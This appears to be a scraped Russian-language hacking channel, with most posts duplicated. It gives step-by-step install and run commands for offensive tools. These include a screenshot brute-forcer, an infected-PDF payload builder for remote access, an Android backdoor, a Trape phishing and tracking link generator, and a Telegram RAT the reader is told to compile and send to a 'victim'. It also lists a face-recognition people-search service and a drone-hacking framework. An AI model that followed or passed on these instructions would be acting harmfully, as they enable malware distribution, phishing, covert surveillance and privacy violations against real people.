Lightshot-Brute-Forcer
Скрипт Python3 cкачивает скриншоты методом грубой силы загруженые пользователями на https://prnt.sc/
Он использует бесплатные прокси для предотвращения ограничения скорости IP и работает в несколько потоков.
https://github.com/hyperstore2020/Lightshot-Brute-Forcer
Скрипт Python3 cкачивает скриншоты методом грубой силы загруженые пользователями на https://prnt.sc/
Он использует бесплатные прокси для предотвращения ограничения скорости IP и работает в несколько потоков.
https://github.com/hyperstore2020/Lightshot-Brute-Forcer
Узнаем человека по фотографии
Search4faces.com — бесплатный сервис для поиска по лицам в соцсетях. На данный момент есть 4 базы изображений:
1 миллиард 109 миллионов 563 тысячи аватарок VK.com;
280 миллионов 781 тысяч аватарок Vk.com + Odnoklassniki.com;
125 миллионов 443 тысячи аватарок TikTok;
4 миллиона 594 тысячи аватарок ClubHouse;
Можно искать не только по фотографии, но и по любому другому изображению человеческого лица. Например, по рисунку или фотороботу.
Search4faces.com — бесплатный сервис для поиска по лицам в соцсетях. На данный момент есть 4 базы изображений:
1 миллиард 109 миллионов 563 тысячи аватарок VK.com;
280 миллионов 781 тысяч аватарок Vk.com + Odnoklassniki.com;
125 миллионов 443 тысячи аватарок TikTok;
4 миллиона 594 тысячи аватарок ClubHouse;
Можно искать не только по фотографии, но и по любому другому изображению человеческого лица. Например, по рисунку или фотороботу.
Как взломать ПК через PDF файл?
Формат PDF имеет множество уязвимостей, благодаря которым в файлы можно "вшивать" вирусы и т.п. В данном посте представлен автоматизированный фреймворк Insanity Framework для создания зараженного PDF-файла, который позволит реализовать удаленный доступ к машинам на Windows.
Установка:
$ git clone https://github.com/4w4k3/Insanity-Framework
$ cd Insanity-Framework
$ chmod +x insanity.py
$ ./install.sh
Использование:
$ sudo python2 insanity.py
При первом запуске установятся все необходимые зависимости и откроется главное меню. В нём выбираем первый пункт для создания полезной нагрузки. Далее выбираем Fake Acrobat PDF. Вводим ip адрес и порт.
Формат PDF имеет множество уязвимостей, благодаря которым в файлы можно "вшивать" вирусы и т.п. В данном посте представлен автоматизированный фреймворк Insanity Framework для создания зараженного PDF-файла, который позволит реализовать удаленный доступ к машинам на Windows.
Установка:
$ git clone https://github.com/4w4k3/Insanity-Framework
$ cd Insanity-Framework
$ chmod +x insanity.py
$ ./install.sh
Использование:
$ sudo python2 insanity.py
При первом запуске установятся все необходимые зависимости и откроется главное меню. В нём выбираем первый пункт для создания полезной нагрузки. Далее выбираем Fake Acrobat PDF. Вводим ip адрес и порт.
GitHub
GitHub - 4w4k3/Insanity-Framework: Generate Payloads and Control Remote Machines. [Discontinued]
Generate Payloads and Control Remote Machines. [Discontinued] - 4w4k3/Insanity-Framework
❤1
Для курса нужно:
1. ноутбук (желательно)
2. Купить Wi-Fi-адаптер Alfa https://aliexpress.ru/item/4001182244965.html
При покупке адаптера напишите продавцу промокод: "Security".
1. ноутбук (желательно)
2. Купить Wi-Fi-адаптер Alfa https://aliexpress.ru/item/4001182244965.html
При покупке адаптера напишите продавцу промокод: "Security".
msfgaf-master.zip
10.9 MB
BackDoor на Android!
Бэкдор - дефект алгоритма, который намеренно встраивается в него разработчиком и позволяет получить несанкционированный доступ к данным или удалённому управлению операционной системой и компьютером в целом.
Основной целью бэкдора является скрытное и быстрое получение доступа к данным, в большинстве случаев - к зашифрованным и защищённым. Например, бэкдор может быть встроен в алгоритм шифрования для последующей прослушки защищённого канала злоумышленником
Использование:
Бэкдор - дефект алгоритма, который намеренно встраивается в него разработчиком и позволяет получить несанкционированный доступ к данным или удалённому управлению операционной системой и компьютером в целом.
Основной целью бэкдора является скрытное и быстрое получение доступа к данным, в большинстве случаев - к зашифрованным и защищённым. Например, бэкдор может быть встроен в алгоритм шифрования для последующей прослушки защищённого канала злоумышленником
Использование:
python2 install.py
👍1
Cледим за пользователем через ссылку.
Trape – OSINT инструмент, который позволяет отслеживать и выполнять атаки социальной инженерии в режиме реального времени.
Trape создает фишинг ссылку, и через нее следит за пользователем.
Благодаря данному инструменту можно получить такую информацию как: IP, локация, ОС.
Также вы сможете запускать удаленно js скрипты, загружать файлы на пк.
Можно будет узнать на каких сервисах зарегестрирован пользователь.
Установка:
$
$
$
1. Фишинг ссылку.
2. Ссылку на админ панель.
3. Пароль для входа в админ панель.
Trape – OSINT инструмент, который позволяет отслеживать и выполнять атаки социальной инженерии в режиме реального времени.
Trape создает фишинг ссылку, и через нее следит за пользователем.
Благодаря данному инструменту можно получить такую информацию как: IP, локация, ОС.
Также вы сможете запускать удаленно js скрипты, загружать файлы на пк.
Можно будет узнать на каких сервисах зарегестрирован пользователь.
Установка:
$
apt update -y
$ apt upgrade -y
$ apt install python
$ apt install git
$ git clone https://github.com/jofpin/trape.git
Запуск:$
cd trape
$ pip3 install -r requirements.txt
$ python3 trape.py --url <ссылка на любую страницу> --port 8080
Запуск(Пример):$
python3 trape.py --url http://example.com --port 8080
Мы получим следующее:1. Фишинг ссылку.
2. Ссылку на админ панель.
3. Пароль для входа в админ панель.
Создаем и распространяем вирус в Telegram
Хотим поделиться с Вами информацией, о том, как создать вирус для удаленного управления целевым ПК с помощью Kali Linux.
Установка в Linux:
apt update && apt upgrade
apt install python3 python3-pip
pip3 install pyinstaller
pip3 install pytelegrambotapi opencv-python cryptography
pip3 install comtypes pywin32
pyaudio pillow pycaw
git clone https://github.com/Bainky/Telegram-RAT
cd Telegram-RAT
Создаем бота в @BotFather. После этого открываем RAT.py через текстовый редактор и вставляем токен и id ранее созданного бота.
Осталось только скомпилировать данный файл:
pyinstaller --onefile --noconsole RAT.py
После того, как процесс компиляции файла будет завершен, отправляем готовый файл нашей жертве.
Если жертва запустит наш вредоносный файл, мы получим удаленный доступ к устройству жертвы в боте Telegram.
Хотим поделиться с Вами информацией, о том, как создать вирус для удаленного управления целевым ПК с помощью Kali Linux.
Установка в Linux:
apt update && apt upgrade
apt install python3 python3-pip
pip3 install pyinstaller
pip3 install pytelegrambotapi opencv-python cryptography
pip3 install comtypes pywin32
pyaudio pillow pycaw
git clone https://github.com/Bainky/Telegram-RAT
cd Telegram-RAT
Создаем бота в @BotFather. После этого открываем RAT.py через текстовый редактор и вставляем токен и id ранее созданного бота.
Осталось только скомпилировать данный файл:
pyinstaller --onefile --noconsole RAT.py
После того, как процесс компиляции файла будет завершен, отправляем готовый файл нашей жертве.
Если жертва запустит наш вредоносный файл, мы получим удаленный доступ к устройству жертвы в боте Telegram.
dronesploit-master.zip
3.3 MB
Взламываем дроны!
DroneSploit — это среда командной строки, основанная на
Необходимости
1) Linux система;
2) Wi-Fi карта с режимом монитора (многие Wi-Fi адаптеры поддерживают этот режим);
DroneSploit — это среда командной строки, основанная на
sploitkit
и попытка собрать методы взлома и эксплойты, особенно ориентированные на взлом дронов. Для простоты использования интерфейс имеет макет, похожий на Metasploit. В настоящее время он поддерживает только очень небольшое количество моделей дронов, но мы надеемся, что в ближайшем будущем мы будем приветствовать новые предложения.Необходимости
1) Linux система;
2) Wi-Fi карта с режимом монитора (многие Wi-Fi адаптеры поддерживают этот режим);